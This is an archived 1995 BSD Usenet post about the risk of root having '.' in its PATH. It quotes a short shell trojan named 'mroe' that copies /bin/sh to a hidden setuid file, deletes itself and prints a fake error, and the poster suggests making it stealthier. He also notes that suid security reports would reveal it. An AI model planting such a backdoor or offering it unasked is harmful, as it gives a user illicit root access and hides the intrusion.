Return to BSD News archive
Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!zombie.ncsc.mil!news.duke.edu!agate!news.mindlink.net!vanbc.wimsey.com!cynic.portal.ca!curt From: curt@cynic.portal.ca (Curt Sampson) Newsgroups: comp.unix.bsd.misc Subject: Re: running as root with . in path Was: MacBSD ? Date: 9 Aug 1995 16:01:04 GMT Organization: Internet Portal Services, Ltd. Lines: 28 Message-ID: <40am40$hqt@wolfe.wimsey.com> References: <3vhdsc$a1q@rigel.pixi.com> <id.TO2M1.IPE@nmti.com> <MARKG.95Aug8220219@kelly.teleport.com> <id.44CM1.5RD@nmti.com> NNTP-Posting-Host: cynic.portal.ca In article <id.44CM1.5RD@nmti.com>, Peter da Silva <peter@nmti.com> wrote: > #!/bin/sh > cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 && > chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 && > rm mroe & > echo 'mroe: Command not found.' Of course, if the user is using sh instead of csh you want to say `mroe: Command not found.' Even that's not terribly useful, though since a sequence like # more /etc/passwd mroe: Command not found. looks just a wee bit suspicious. :-) Better would be just to exec the real command when you're done with your activities. Also, note that the suid file change should show up in the daily security report. If odd files are becoming suid root, that's surely a sign to investigate. cjs -- Curt Sampson curt@portal.ca Info at http://www.portal.ca/ Internet Portal Services, Inc. Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.